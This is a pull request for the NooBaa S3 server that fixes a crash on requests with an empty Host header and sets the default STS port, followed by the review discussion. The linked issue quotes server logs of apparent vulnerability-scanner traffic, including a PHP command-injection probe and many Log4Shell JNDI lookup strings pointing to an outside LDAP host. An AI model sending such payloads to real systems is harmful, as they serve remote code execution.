### PR TITLE
NSFS | S3 throwing error for empty header and default port for STS

### LINKED ISSUE #8509: core.endpoint.sts.sts_rest:: STS ERROR , anonymous account and log4j error messages in s3_rest.js
### Environment info
- NooBaa Version: **VERSION**
- Platform: **Kubernetes 1.14.1 | minikube 1.1.1 | OpenShift 4.1 | other: specify**

noobaa d/s 5.17.0-20241023 build (it is in all the builds of the 5.17.0-202410XX onwards looks like 

Observed the errors and log4j related when the S3 service is stopped, hence opening this defect.. 

Just checking backward now the first occurrence in the noobaa.log is as shown below 

```
Oct  9 00:40:46 node-gui1 node[3003970]: [/3003970] ESC[36m  [LOG]ESC[39m CONSOLE:: init_rand_seed: seeding with 32 bytes
Oct  9 00:40:58 node-gui1 [2820562]: [nsfs/2820562] ESC[33m [WARN]ESC[39m core.util.signature_utils:: Anonymous request: GET / {}
Oct  9 00:40:58 node-gui1 [2820562]: [nsfs/2820562] ESC[31m[ERROR]ESC[39m core.endpoint.sts.sts_rest:: STS ERROR <?xml version="1.0" encoding="UTF-8"?><Error><Code>InternalFailure</Code><Message>The request processing has failed because of an unknown error, exception or failure.</Message><Resource>/</Resource><RequestId>m21dtme3-9q546j-fbw</RequestId></Error> GET / {} Error: The request processing has failed because of an unknown error, exception or failure.    at parse_request_body (/usr/local/noobaa-core/src/util/http_utils.js:283:15)    at Object.read_and_parse_body (/usr/local/noobaa-core/src/util/http_utils.js:247:11)    at process.processTicksAndRejections (node:internal/process/task_queues:95:5)    at async handle_request (/usr/local/noobaa-core/src/endpoint/sts/sts_rest.js:83:5)    at async sts_rest (/usr/local/noobaa-core/src/endpoint/sts/sts_rest.js:41:9)
Oct  9 00:40:58 node-gui1 [2820562]: [nsfs/2820562] ESC[33m [WARN]ESC[39m core.util.signature_utils:: Anonymous request: GET / {}
Oct  9 00:40:58 node-gui1 [2820562]: [nsfs/2820562] ESC[31m[ERROR]ESC[39m core.endpoint.s3.s3_rest:: S3 ERROR <?xml version="1.0" encoding="UTF-8"?><Error><Code>InternalError</Code><Message>We encountered an internal error. Please try again.</Message><Resource>/</Resource><RequestId>m21dtme5-9rdlag-zam</RequestId></Error> GET / {} TypeError: Cannot read properties of undefined (reading 'split')    at parse_bucket_and_key (/usr/local/noobaa-core/src/endpoint/s3/s3_rest.js:305:31)    at populate_request_additional_info_or_redirect (/usr/local/noobaa-core/src/endpoint/s3/s3_rest.js:174:28)    at handle_request (/usr/local/noobaa-core/src/endpoint/s3/s3_rest.js:108:28)    at Object.s3_rest [as handler] (/usr/local/noobaa-core/src/endpoint/s3/s3_rest.js:66:15)    at Server.endpoint_request_handler (/usr/local/noobaa-core/src/endpoint/endpoint.js:286:28)    at Server.emit (node:events:518:28)    at Server.emit (node:domain:488:12)    at parserOnIncoming (node:_http_server:1143:12)    at HTTPParser.parserOnHeadersComplete (node:_http_common:119:17)

```
### Actual behavior
1. Following messages are observed in the noobaa.log and the gpfs.log as shown below 

noobaa.log on the node 

```
Nov  5 00:21:19 node-gui1 [1331512]: [nsfs/1331512] ESC[33m [WARN]ESC[39m core.util.signature_utils:: Anonymous request: GET / {}
Nov  5 00:21:19 node-gui1 [1331512]: [nsfs/1331512] ESC[31m[ERROR]ESC[39m core.endpoint.sts.sts_rest:: STS ERROR <?xml version="1.0" encoding="UTF-8"?><Error><Code>InternalFailure</Code><Message>The request processing has failed because of an unknown error, exception or failure.</Message><Resource>/</Resource><RequestId>m3405ihm-aj194m-680</RequestId></Error> GET / {} Error: The request processing has failed because of an unknown error, exception or failure.    at parse_request_body (/usr/local/noobaa-core/src/util/http_utils.js:283:15)    at Object.read_and_parse_body (/usr/local/noobaa-core/src/util/http_utils.js:247:11)    at process.processTicksAndRejections (node:internal/process/task_queues:95:5)    at async handle_request (/usr/local/noobaa-core/src/endpoint/sts/sts_rest.js:83:5)    at async sts_rest (/usr/local/noobaa-core/src/endpoint/sts/sts_rest.js:41:9)
Nov  5 00:21:19 node-gui1 [1331512]: [nsfs/1331512] ESC[33m [WARN]ESC[39m core.util.signature_utils:: Anonymous request: GET / {}
Nov  5 00:21:19 node-gui1 [1331512]: [nsfs/1331512] ESC[31m[ERROR]ESC[39m core.endpoint.s3.s3_rest:: S3 ERROR <?xml version="1.0" encoding="UTF-8"?><Error><Code>InternalError</Code><Message>We encountered an internal error. Please try again.</Message><Resource>/</Resource><RequestId>m3405iic-ayluiw-1aru</RequestId></Error> GET / {} TypeError: Cannot read properties of undefined (reading 'split')    at parse_bucket_and_key (/usr/local/noobaa-core/src/endpoint/s3/s3_rest.js:305:31)    at populate_request_additional_info_or_redirect (/usr/local/noobaa-core/src/endpoint/s3/s3_rest.js:174:28)    at handle_request (/usr/local/noobaa-core/src/endpoint/s3/s3_rest.js:108:28)    at Object.s3_rest [as handler] (/usr/local/noobaa-core/src/endpoint/s3/s3_rest.js:66:15)    at Server.endpoint_request_handler (/usr/local/noobaa-core/src/endpoint/endpoint.js:286:28)    at Server.emit (node:events:518:28)    at Server.emit (node:domain:488:12)    at parserOnIncoming (node:_http_server:1143:12)    at HTTPParser.parserOnHeadersComplete (node:_http_common:119:17)

Nov  5 00:32:20 node-gui1 [1331512]: [nsfs/1331512] [ERROR] core.endpoint.s3.s3_rest:: S3 ERROR <?xml version="1.0" encoding="UTF-8"?><Error><Code>Invalid
AccessKeyId</Code><Message>The AWS access key Id you provided does not exist in our records.</Message><Resource>/</Resource><RequestId>m340joi5-a7121q-ruy</Re
questId></Error> GET / {"host":"gpfs-p10-gui1.rtp.raleigh.ibm.com:6443","accept-charset":"iso-8859-1,utf-8;q=0.9,*;q=0.1","accept-language":"en","connection":
"Keep-Alive","user-agent":"Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0)","pragma":"no-cache","accept":"image/gif, image/x-xbitmap, image/jp
eg, image/pjpeg, image/png, */*"} Error: Account with access_key not found    at NsfsObjectSDK.load_requesting_account (/usr/local/noobaa-core/src/sdk/object_
sdk.js:232:61)    at async authorize_request (/usr/local/noobaa-core/src/endpoint/s3/s3_rest.js:205:5)    at async handle_request (/usr/local/noobaa-core/src/
endpoint/s3/s3_rest.js:126:5)    at async Object.s3_rest [as handler] (/usr/local/noobaa-core/src/endpoint/s3/s3_rest.js:66:9)
Nov  5 00:32:20 gpfs-p10-gui1 [1331513]: [nsfs/1331513]  [WARN] core.util.signature_utils:: Anonymous request: GET /cgi-bin/hw3.php?daysonly=0).system(id).( {
 host: 'node-gui1.rtp.raleigh.ibm.com:6443', 'accept-charset': 'iso-8859-1,utf-8;q=0.9,*;q=0.1', 'accept-language': 'en', connection: 'Keep-Alive', 'user-
agent': 'Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0)', pragma: 'no-cache', accept: 'image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, i
mage/png, */*' }
Nov  5 00:32:20 node-gui1 [1331513]: [nsfs/1331513]  [WARN] core.util.signature_utils:: Anonymous request: GET /cgi-bin/hw3.php?daysonly=0).system(id).( {
 host: 'node-gui1.rtp.raleigh.ibm.com:6443', 'accept-charset': 'iso-8859-1,utf-8;q=0.9,*;q=0.1', 'accept-language': 'en', connection: 'Keep-Alive', 'user-
agent': 'Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0)', pragma: 'no-cache', accept: 'image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, i
mage/png, */*' }
Nov  5 00:32:20 node-gui1 [1331513]: [nsfs/1331513]  [WARN] core.sdk.config_fs:: get_config_data: with config_file_path /ibm/fvt_ces_root/ces/s3-config/ac
counts/anonymous.json got an error [Error: No such file or directory] { code: 'ENOENT', context: 'Readfile _path=/ibm/fvt_ces_root/ces/s3-config/accounts/anon
ymous.json ' }
Nov  5 00:32:20 node-gui1 [1331513]: [nsfs/1331513] [ERROR] core.sdk.bucketspace_fs:: BucketSpaceFS.read_account_by_access_key: failed with error [Error:
No such file or directory] { code: 'ENOENT', context: 'Readfile _path=/ibm/fvt_ces_root/ces/s3-config/accounts/anonymous.json ' }
Nov  5 00:32:20 node-gui1 [1331513]: [nsfs/1331513] [ERROR] core.sdk.object_sdk:: load_requesting_account error: RpcError: Account with access_key not fou
nd.    at BucketSpaceFS.read_account_by_access_key (/usr/local/noobaa-core/src/sdk/bucketspace_fs.js:93:23)    at async LRUCache._load_item (/usr/local/noobaa
-core/src/util/lru_cache.js:83:22)    at async LRUCache.get_with_cache (/usr/local/noobaa-core/src/util/lru_cache.js:72:13)    at async NsfsObjectSDK.load_req
uesting_account (/usr/local/noobaa-core/src/sdk/object_sdk.js:217:39)    at async authorize_request (/usr/local/noobaa-core/src/endpoint/s3/s3_rest.js:205:5)
   at async handle_request (/usr/local/noobaa-core/src/endpoint/s3/s3_rest.js:126:5)    at async Object.s3_rest [as handler] (/usr/local/noobaa-core/src/endpo
int/s3/s3_rest.js:66:9) {  rpc_code: 'NO_SUCH_ACCOUNT',  rpc_data: [Error: No such file or directory] { code: 'ENOENT', context: 'Readfile _path=/ibm/fvt_ces_
root/ces/s3-config/accounts/anonymous.json ' }}
Nov  5 00:32:20 node-gui1 [1331513]: [nsfs/1331513] [ERROR] core.endpoint.s3.s3_rest:: S3 ERROR <?xml version="1.0" encoding="UTF-8"?><Error><Code>Invalid
AccessKeyId</Code><Message>The AWS access key Id you provided does not exist in our records.</Message><Resource>/cgi-bin/hw3.php?daysonly=0).system(id).(</Res
ource><RequestId>m340joiv-am64db-5w7</RequestId></Error> GET /cgi-bin/hw3.php?daysonly=0).system(id).( {"host":"node-gui1.com:6443","accep
t-charset":"iso-8859-1,utf-8;q=0.9,*;q=0.1","accept-language":"en","connection":"Keep-Alive","user-agent":"Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1;
Trident/4.0)","pragma":"no-cache","accept":"image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, image/png, */*"} Error: Account with access_key not found
at NsfsObjectSDK.load_requesting_account (/usr/local/noobaa-core/src/sdk/object_sdk.js:232:61)    at async authorize_request (/usr/local/noobaa-core/src/endpo
int/s3/s3_rest.js:205:5)    at async handle_request (/usr/local/noobaa-core/src/endpoint/s3/s3_rest.js:126:5)    at async Object.s3_rest [as handler] (/usr/lo
cal/noobaa-core/src/endpoint/s3/s3_rest.js:66:9)
```
gpfs.log when  the S3 service is shutdown 
```

Nov 05 00:38:07 node-gui1 [1331512]: [nsfs/1331512]  [WARN] core.util.signature_utils:: Anonymous request: GET /cgi-bin/administrator.cgi { host: 'node-gui1.com:7443', 'accept-charset': 'iso-8859-1,utf-8;q=0.9,*;q=0.1', 'accept-language': '${jndi:ldap://log4shell-generic-BSwhhXUF6D0UBLALnPc4
${lower:ten}.w.nessus.org/nessus}', connection: 'Keep-Alive', referer: '${jndi:ldap://log4shell-generic-BSwhhXUF6D0UBLALnPc4${lower:ten}.w.nessus.org/nessus}'
, 'x-api-version': '${jndi:ldap://log4shell-generic-BSwhhXUF6D0UBLALnPc4${lower:ten}.w.nessus.org/nessus}', cookie: '${jndi:ldap://log4shell-generic-BSwhhXUF6
D0UBLALnPc4${lower:ten}.w.nessus.org/nessus}=${jndi:ldap://log4shell-generic-BSwhhXUF6D0UBLALnPc4${lower:ten}.w.nessus.org/nessus};JSESSIONID=${jndi:ldap://lo
g4shell-generic-BSwhhXUF6D0UBLALnPc4${lower:ten}.w.nessus.org/nessus};SESSIONID=${jndi:ldap://log4shell-generic-BSwhhXUF6D0UBLALnPc4${lower:ten}.w.nessus.org/nessus};PHPSESSID=${jndi:ldap://log4shell-generic-BSwhhXUF6D0UBLALnPc4${lower:ten}.w.nessus.org/nessus};token=${jndi:ldap://log4shell-generic-BSwhhXUF6D0UBLALnPc4${lower:ten}.w.nessus.org/nessus};session=${jndi:ldap://log4shell-generic-BSwhhXUF6D0UBLALnPc4${lower:ten}.w.nessus.org/nessus}', 'user-agent': '${jndi:ldap://log4shell-generic-BSwhhXUF6D0UBLALnPc4${lower:ten}.w.nessus.org/nessus}', pragma: 'no-cache', 'if-modified-since': '${jndi:ldap://log4shell-generic-BSwhhXUF6D0UBLALnPc4${lower:ten}.w.nessus.org/nessus}', accept: '${jndi:ldap://log4shell-generic-BSwhhXUF6D0UBLALnPc4${lower:ten}.w.nessus.org/nessus}' }
Nov 05 00:38:07 node-gui1 [1331512]: [nsfs/1331512] [ERROR] core.endpoint.sts.sts_rest:: STS ERROR <?xml version="1.0" encoding="UTF-8"?><Error><Code>InternalFailure</Code><Message>The request processing has failed because of an unknown error, exception or failure.</Message><Resource>/cgi-bin/administrator.cgi</Resource><RequestId>m340r4t3-5kzozq-17c3</RequestId></Error> GET /cgi-bin/administrator.cgi {"host":"node-gui1.com:7443","accept-charset":"iso-8859-1,utf-8;q=0.9,*;q=0.1","accept-language":"${jndi:ldap://log4shell-generic-BSwhhXUF6D0UBLALnPc4${lower:ten}.w.nessus.org/nessus}","connection":"Keep-Alive","referer":"${jndi:ldap://log4shell-generic-BSwhhXUF6D0UBLALnPc4${lower:ten}.w.nessus.org/nessus}","x-api-version":"${jndi:ldap://log4shell-generic-BSwhhXUF6D0UBLALnPc4${lower:ten}.w.nessus.org/nessus}","cookie":"${jndi:ldap://log4shell-generic-BSwhhXUF6D0UBLALnPc4${lower:ten}.w.nessus.org/nessus}=${jndi:ldap://log4shell-generic-BSwhhXUF6D0UBLALnPc4${lower:ten}.w.nessus.org/nessus};JSESSIONID=${jndi:ldap://log4shell-generic-BSwhhXUF6D0UBLALnPc4${lower:ten}.w.nessus.org/nessus};SESSIONID=${jndi:ldap://log4shell-generic-BSwhhXUF6D0UBLALnPc4${lower:ten}.w.nessus.org/nessus};PHPSESSID=${jndi:ldap://log4shell-generic-BSwhhXUF6D0UBLALnPc4${lower:ten}.w.nessus.org/nessus};token=${jndi:ldap://log4shell-generic-BSwhhXUF6D0UBLALnPc4${lower:ten}.w.nessus.org/nessus};session=${jndi:ldap://log4shell-generic-BSwhhXUF6D0UBLALnPc4${lower:ten}.w.nessus.org/nessus}","user-agent":"${jndi:ldap://log4shell-generic-BSwhhXUF6D0UBLALnPc4${lower:ten}.w.nessus.org/nessus}","pragma":"no-cache","if-modified-since":"${jndi:ldap://log4shell-generic-BSwhhXUF6D0UBLALnPc4${lower:ten}.w.nessus.org/nessus}","accept":"${jndi:ldap://log4shell-generic-BSwhhXUF6D0UBLALnPc4${lower:ten}.w.nessus.org/nessus}"} Error: The request processing has failed because of an unknown error, exception or failure.    at parse_request_body (/usr/local/noobaa-core/src/util/http_utils.js:283:15)    at Object.read_and_parse_body (/usr/local/noobaa-core/src/util/http_utils.js:247:11)    at process.processTicksAndRejections (node:internal/process/task_queues:95:5)    at async handle_request (/usr/local/noobaa-core/src/endpoint/sts/sts_rest.js:83:5)    at async sts_rest (/usr/local/noobaa-core/src/endpoint/sts/sts_rest.js:41:9)
Nov 05 00:38:12 node-gui1 [1331513]: [nsfs/1331513]  [WARN] core.util.signature_utils:: Anonymous request: GET /cgi-bin/agorn.cgi { host: 'node-gui1.com:7443', 'accept-charset': 'iso-8859-1,utf-8;q=0.9,*;q=0.1', 'accept-language': '${jndi:ldap://log4shell-generic-BSwhhXUF6D0UBLALnPc4${lower:
ten}.w.nessus.org/nessus}', connection: 'Keep-Alive', referer: '${jndi:ldap://log4shell-generic-BSwhhXUF6D0UBLALnPc4${lower:ten}.w.nessus.org/nessus}', 'x-api
-version': '${jndi:ldap://log4shell-generic-BSwhhXUF6D0UBLALnPc4${lower:ten}.w.nessus.org/nessus}', cookie: '${jndi:ldap://log4shell-generic-BSwhhXUF6D0UBLALn
Pc4${lower:ten}.w.nessus.org/nessus}=${jndi:ldap://log4shell-generic-BSwhhXUF6D0UBLALnPc4${lower:ten}.w.nessus.org/nessus};JSESSIONID=${jndi:ldap://log4shell-
generic-BSwhhXUF6D0UBLALnPc4${lower:ten}.w.nessus.org/nessus};SESSIONID=${jndi:ldap://log4shell-generic-BSwhhXUF6D0UBLALnPc4${lower:ten}.w.nessus.org/nessus};
PHPSESSID=${jndi:ldap://log4shell-generic-BSwhhXUF6D0UBLALnPc4${lower:ten}.w.nessus.org/nessus};token=${jndi:ldap://log4shell-generic-BSwhhXUF6D0UBLALnPc4${lo
wer:ten}.w.nessus.org/nessus};session=${jndi:ldap://log4shell-generic-BSwhhXUF6D0UBLALnPc4${lower:ten}.w.nessus.org/nessus}', 'user-agent': '${jndi:ldap://log
4shell-generic-BSwhhXUF6D0UBLALnPc4${lower:ten}.w.nessus.org/nessus}', pragma: 'no-cache', 'if-modified-since': '${jndi:ldap://log4shell-generic-BSwhhXUF6D0UB
LALnPc4${lower:ten}.w.nessus.org/nessus}', accept: '${jndi:ldap://log4shell-generic-BSwhhXUF6D0UBLALnPc4${lower:ten}.w.nessus.org/nessus}' }
Nov 05 00:38:12 node-gui1 [1331513]: [nsfs/1331513] [ERROR] core.endpoint.sts.sts_rest:: STS ERROR <?xml version="1.0" encoding="UTF-8"?><Error><Code>Inte
rnalFailure</Code><Message>The request processing has failed because of an unknown error, exception or failure.</Message><Resource>/cgi-bin/agorn.cgi</Resourc
e><RequestId>m340r8pb-6ds42k-trb</RequestId></Error> GET /cgi-bin/agorn.cgi {"host":"gpfs-p10-gui1.rtp.raleigh.ibm.com:7443","accept-charset":"iso-8859-1,utf-8;q=0.9,*;q=0.1","accept-language":"${jndi:ldap://log4shell-generic-BSwhhXUF6D0UBLALnPc4${lower:ten}.w.nessus.org/nessus}","connection":"Keep-Alive","referer":"${jndi:ldap://log4shell-generic-BSwhhXUF6D0UBLALnPc4${lower:ten}.w.nessus.org/nessus}","x-api-version":"${jndi:ldap://log4shell-generic-BSwhhXUF6D0UBLALnPc4${lower:ten}.w.nessus.org/nessus}","cookie":"${jndi:ldap://log4shell-generic-BSwhhXUF6D0UBLALnPc4${lower:ten}.w.nessus.org/nessus}=${jndi:ldap://log4shell-generic-BSwhhXUF6D0UBLALnPc4${lower:ten}.w.nessus.org/nessus};JSESSIONID=${jndi:ldap://log4shell-generic-BSwhhXUF6D0UBLALnPc4${lower:ten}.w.nessus.org/nessus};SESSIONID=${jndi:ldap://log4shell-generic-BSwhhXUF6D0UBLALnPc4${lower:ten}.w.nessus.org/nessus};PHPSESSID=${jndi:ldap://log4shell-generic-BSwhhXUF6D0UBLALnPc4${lower:ten}.w.nessus.org/nessus};token=${jndi:ldap://log4shell-generic-BSwhhXUF6D0UBLALnPc4${lower:ten}.w.nessus.org/nessus};session=${jndi:ldap://log4shell-generic-BSwhhXUF6D0UBLALnPc4${lower:ten}.w.nessus.org/nessus}","user-agent":"${jndi:ldap://log4shell-generic-BSwhhXUF6D0UBLALnPc4${lower:ten}.w.nessus.org/nessus}","pragma":"no-cache","if-modified-since":"${jndi:ldap://log4shell-generic-BSwhhXUF6D0UBLALnPc4${lower:ten}.w.nessus.org/nessus}","accept":"${jndi:ldap://log4shell-generic-BSwhhXUF6D0UBLALnPc4${lower:ten}.w.nessus.org/nessus}"} Error: The request processing has failed because of an unknown error, exception or failure.    at parse_request_body (/usr/local/noobaa-core/src/util/http_utils.js:283:15)    at Object.read_and_parse_body (/usr/local/noobaa-core/src/util/http_utils.js:247:11)    at process.processTicksAndRejections (node:internal/process/task_queues:95:5)    at async handle_request (/usr/local/noobaa-core/src/endpoint/sts/sts_rest.js:83:5)    at async sts_rest (/usr/local/noobaa-core/src/endpoint/sts/sts_rest.js:41:9)
Nov 05 00:38:16 node-gui1 systemd[1]: Stopping The NooBaa service....
Nov 05 00:38:16 node-gui1 systemd[1]: noobaa.service: Killing process 1331522 (node) with signal SIGKILL
....


## Expected behavior
1.

The error messages when stopping the S3 service and then continuous logs in the noobaa file should be investigated as we havent created any anonymous S3 user in the environment 

### Steps to reproduce
1.

Didn't do anything specific to the operation, it shows anonymous.json as account which is not created at all in the system 

### More information - Screenshots / Logs / Other output
Will upload the noobaa.log and the gpfs.log into the box folder https://ibm.ent.box.com/folder/292595927684

### PR DESCRIPTION
**Pull request by naveenpaul1**
### Explain the changes
1. Added check for host header if its missing return empty response
2. set default port for STS only if its not NC

### Issues: Fixed #xxx / Gap #xxx
1. https://github.com/noobaa/noobaa-core/issues/8509

### Testing Instructions:
1. Start the NSFS server with: sudo node src/cmd/nsfs
2. Send S3 request without host header
```
curl https://localhost:6443 --http1.0 -H 'Host:' --insecure
```
3. Request should not return any response
4. S3 request with host header should return error response
```
curl https://localhost:6443 --http1.0 --insecure
```

- [ ] Doc added/updated
- [ ] Tests added

### CODE REVIEW

File: src/endpoint/s3/s3_rest.js [hunk 1]
```diff
@@ -334,7 +334,7 @@ function _get_arn_from_req_path(req) {
 // we will reintreduce it together with bucket site support.
 function parse_bucket_and_key(req) {
     const { url, headers, virtual_hosts } = req;
-    const host = headers.host.split(':')[0]; // cutting off port
+    const host = headers?.host?.split(':')[0]; // cutting off port
```
Comment (romayalon) [inline src/endpoint/s3/s3_rest.js:338]: @naveenpaul1 do we need to throw here an error about this missing host header?
how AWS react to this missing host header?

File: src/endpoint/endpoint.js [hunk 2]
```diff
@@ -197,9 +197,9 @@ async function main(options = {}) {
         // START S3, STS & IAM SERVERS & CERTS
         const http_port_s3 = options.http_port || config.ENDPOINT_PORT;
         const https_port_s3 = options.https_port || config.ENDPOINT_SSL_PORT;
-        const https_port_sts = options.https_port_sts || Number(process.env.ENDPOINT_SSL_PORT_STS) || 7443; // || (process.env.NC_NSFS_NO_DB_ENV === 'true' ? -1 : 7443);
+        const https_port_sts = options.https_port_sts || Number(process.env.ENDPOINT_SSL_PORT_STS) ||
```
Comment (romayalon) [inline src/endpoint/endpoint.js:200]: S3 and IAM are handling this logic in config.json, is it possible to move this there as well?

File: src/endpoint/s3/s3_rest.js (hunk 1 above)
Comment (naveenpaul1) [reply src/endpoint/s3/s3_rest.js:338]: @romayalon I am not sure how to send the request to AWS s3 without host header, In doc I could see host header is required property for AWS S3. [doc ](https://docs.aws.amazon.com/AmazonS3/latest/API/RESTCommonRequestHeaders.html)
For testing this fix I have to remove the host header inside the code.

File: config.js [hunk 3]
```diff
@@ -896,7 +896,7 @@ config.NSFS_NC_CONFIG_DIR_BACKEND = '';
 config.NSFS_NC_STORAGE_BACKEND = '';
 config.ENDPOINT_PORT = Number(process.env.ENDPOINT_PORT) || 6001;
 config.ENDPOINT_SSL_PORT = Number(process.env.ENDPOINT_SSL_PORT) || 6443;
-config.ENDPOINT_SSL_STS_PORT = Number(process.env.ENDPOINT_SSL_STS_PORT) || -1;
+config.ENDPOINT_SSL_STS_PORT = Number(process.env.ENDPOINT_SSL_STS_PORT) || (process.env.NC_NSFS_NO_DB_ENV === 'true' ? -1 : 7443);
```
Comment (shirady) [inline config.js:899]: I would just add a comment for us that when we will support STS in NSFS we can remove this condition.

File: src/endpoint/endpoint.js [hunk 4]
```diff
@@ -197,9 +197,8 @@ async function main(options = {}) {
         // START S3, STS & IAM SERVERS & CERTS
         const http_port_s3 = options.http_port || config.ENDPOINT_PORT;
         const https_port_s3 = options.https_port || config.ENDPOINT_SSL_PORT;
-        const https_port_sts = options.https_port_sts || Number(process.env.ENDPOINT_SSL_PORT_STS) || 7443; // || (process.env.NC_NSFS_NO_DB_ENV === 'true' ? -1 : 7443);
+        const https_port_sts = options.https_port_sts || config.ENDPOINT_SSL_STS_PORT;
         const https_port_iam = options.https_port_iam || config.ENDPOINT_SSL_IAM_PORT;
-
```
Comment (shirady) [inline src/endpoint/endpoint.js:202]: If you can add back the newline, I think we wanted a separation between the port's definitions and the calls to the functions.

**Review by shirady — COMMENTED** [review]
I added a few comments

File: src/endpoint/s3/s3_rest.js (hunk 1 above)
Comment (naveenpaul1) [reply src/endpoint/s3/s3_rest.js:338]: @romayalon I sent `https` request to AWS S3 url  `{bucket-name}.s3.amazonaws.com` without any header and got `AccessDenied` error. Do we need to return the same error if header is missing?

Comment (romayalon) [reply src/endpoint/s3/s3_rest.js:338]: @naveenpaul1 if you attach the host header, do you have access to the bucket?

Comment (naveenpaul1) [reply src/endpoint/s3/s3_rest.js:338]: @romayalon I send the request from JS, to make sure no headers.
```
        const res = await http_utils.make_https_request({
            hostname: '{bucket-name}.s3.amazonaws.com',
            method: 'GET'
        });
```
Not 100% sure this will send request without any default header, since we cant check in AWS S3 side. It dont have any access credentials.

Comment (romayalon) [reply src/endpoint/s3/s3_rest.js:338]: @naveenpaul1 we print headers on our logs, try this code directed to NooBaa and check the logs

Comment (naveenpaul1) [reply src/endpoint/s3/s3_rest.js:338]: @romayalon tried the same even this request have header info
`Anonymous request: GET / { host: 'localhost:6443', connection: 'close' }`

Comment (romayalon) [reply src/endpoint/s3/s3_rest.js:338]: @naveenpaul1 do you have an anonymous user in your system?

Comment (romayalon) [reply src/endpoint/s3/s3_rest.js:338]: ok so create one and compare the behavior
when I compare on AWS these 2 - 
1. curl https://{bucket-name}.s3.amazonaws.com --http1.0 -H 'Host:'
2. curl https://{bucket-name}.s3.amazonaws.com 
I see that only the second one returns a response as you mentioned, I expect NooBaa to have similar behavior

File: src/endpoint/s3/s3_rest.js [hunk 5]
```diff
@@ -96,6 +96,12 @@ async function handle_request(req, res) {
         error_token_expired: S3Error.ExpiredToken,
         auth_token: () => signature_utils.make_auth_token_from_request(req)
     };
+    // AWS s3 returns an empty response when s3 request sends without host header.
+    if (!req.headers.host) {
+        dbg.warn('s3_rest: handle_request: S3 request is missing host header, header ', req.headers);
```
Comment (shirady) [inline src/endpoint/s3/s3_rest.js:101]: Suggesting to clarify that those are the current headers that are printed.
```suggestion
        dbg.warn('s3_rest: handle_request: S3 request is missing host header, request headers ', req.headers);
```

File: src/endpoint/s3/s3_rest.js [hunk 6]
```diff
@@ -96,6 +96,12 @@ async function handle_request(req, res) {
...
+        res.end();
```
Comment (shirady) [inline src/endpoint/s3/s3_rest.js:102]: Don't we need to return a status code?
I see in other examples that before we use `res.end(); return;` we set `res.statusCode = `.

File: src/endpoint/s3/s3_rest.js (hunk 1 above)
Comment (shirady) [reply src/endpoint/s3/s3_rest.js]: Why do you run the curl with `--http1.0` in the first option?

File: src/endpoint/s3/s3_rest.js (hunk 5 above)
Comment (naveenpaul1) [reply src/endpoint/s3/s3_rest.js:101]: I think only adding header also should be fine

File: src/endpoint/s3/s3_rest.js (hunk 1 above)
Comment (shirady) [reply src/endpoint/s3/s3_rest.js]: I'm not sure it is related to the PR, but for the manual tests - I see in AWS `AccessDenied`, where did I wrong? (I tried to follow the testing steps)

(no missing HOST header)
1) I tried to run: `curl https://{bucket-name}.s3.amazonaws.com` with my bucket:
- `curl https://shira-bucket.s3.amazonaws.com`
- and also `AWS_ACCESS_KEY_ID="" AWS_SECRET_ACCESS_KEY="" curl https://shira-bucket.s3.amazonaws.com`

and in both cases I saw `AccessDenied`.

2) When I tried: `curl https://localhost:6443 --http1.0 --insecure` (after running `sudo node src/cmd/nsfs --debug 5`)
- before I had anonymous account it was `InvalidAccessKeyId`
- after I created anonymous account (`sudo node src/cmd/manage_nsfs account add --anonymous --uid 3333 --gid 3333`) I saw `ListAllMyBucketsResult`.

File: src/endpoint/s3/s3_rest.js (hunk 5 above)
Comment (shirady) [reply src/endpoint/s3/s3_rest.js:101]: I just think there is a typo there "header" instead of "headers".

File: src/endpoint/s3/s3_rest.js (hunk 1 above)
Comment (romayalon) [reply src/endpoint/s3/s3_rest.js]: @shirady I used a public bucket like noobaa-core-rpms, you get access denied because shira-bucket isn't public

Comment (shirady) [reply src/endpoint/s3/s3_rest.js]: Thanks, so in this case (`curl https://noobaa-core-rpms.s3.amazonaws.com`) I can also see the `/ListBucketResult`, so it is fine (both servers return the `ListAllMyBucketsResult`).

File: src/endpoint/s3/s3_rest.js (hunk 6 above)
Comment (naveenpaul1) [reply src/endpoint/s3/s3_rest.js:102]: @shirady I can add Bad Request error code(400), WDYT?

File: src/endpoint/s3/s3_rest.js (hunk 1 above)
Comment (naveenpaul1) [reply src/endpoint/s3/s3_rest.js]: @shirady and you need to add the header flag with empty host
` -H 'Host:' `

File: src/endpoint/s3/s3_rest.js (hunk 6 above)
Comment (romayalon) [reply src/endpoint/s3/s3_rest.js:102]: @naveenpaul1 it's not our decision, we need to follow AWS, make sure we return what they return

Comment (naveenpaul1) [reply src/endpoint/s3/s3_rest.js:102]: @romayalon AWS is returning `307: Temporary Redirect` error code with a location 
`Location: https://aws.amazon.com/s3/`, Since we dont have a location to redirect can we leave the location empty?
```
curl https://{bucket-name}.s3.amazonaws.com --http1.0 -H 'Host:' -v
HTTP/1.1 307 Temporary Redirect
< x-amz-id-2: eQref0gQxYWqX3+wYaVPfalsHqkifllRfkuOiN2E5LlcTkI/xDphkfxuj4/xG4GJXlRY8lOPqUjCEa5OOJCn//JfmwUgf7vLvDr/U/kM92k=
< x-amz-request-id: H5WMCF0G2HM2P1J8
< Date: Tue, 17 Dec 2024 09:14:10 GMT
< Location: https://aws.amazon.com/s3/
< Content-Length: 0
< Server: AmazonS3
< Connection: close

```

Comment (shirady) [reply src/endpoint/s3/s3_rest.js:102]: I think you need to rerun it again with the `-L` flag: `curl https://noobaa-core-rpms.s3.amazonaws.com --http1.0 -H 'Host:' -v -L` (the `noobaa-core-rpms` is a public bucket name, you can use `curl https://noobaa-core-rpms.s3.amazonaws.com --http1.0 -H 'Host:' -v -L | grep "HTTP/1.1"` for smaller output) and then compare the results - you should see that in AWS it starts with "HTTP/1.1 307 Temporary Redirect" and then "HTTP/1.1 200", and I think we return also 200 status code (`curl https://localhost:6443 --http1.0 -H 'Host:' --insecure -v` "HTTP/1.1 200 OK").
So I'm not sure we need to add the status code as I asked.

Comment (naveenpaul1) [reply src/endpoint/s3/s3_rest.js:102]: @shirady  because of the redirected URL in this case its `https://aws.amazon.com/s3/` is a valid url and this redirected request return complete s3 aws web page with a response code 200.

